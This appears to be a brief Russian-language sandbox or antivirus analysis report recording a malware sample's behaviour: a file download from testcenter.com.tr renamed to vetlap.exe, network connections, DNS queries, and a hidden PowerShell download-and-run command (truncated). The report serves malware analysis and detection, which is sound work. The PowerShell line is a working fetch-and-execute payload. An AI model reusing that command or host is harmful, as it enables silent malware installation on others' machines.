Техническая информация
- http://testcenter.com.tr/file/putty.exe как %homepath%\vetlap.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://testcenter.com.tr/file/putty.exe','%USERPROFILE%\VETLAP.exe');Start-P...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- 'te####nter.com.tr':80
- 'te####nter.com.tr':443
- 'x1.#.lencr.org':80
- http://te####nter.com.tr/file/putty.exe
- http://x1.#.lencr.org/
- 'te####nter.com.tr':443
- DNS ASK te####nter.com.tr
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://testcenter.com.tr/file/putty.exe','%USERPROFILE%\VETLAP.exe');Start-P... (со скрытым окном)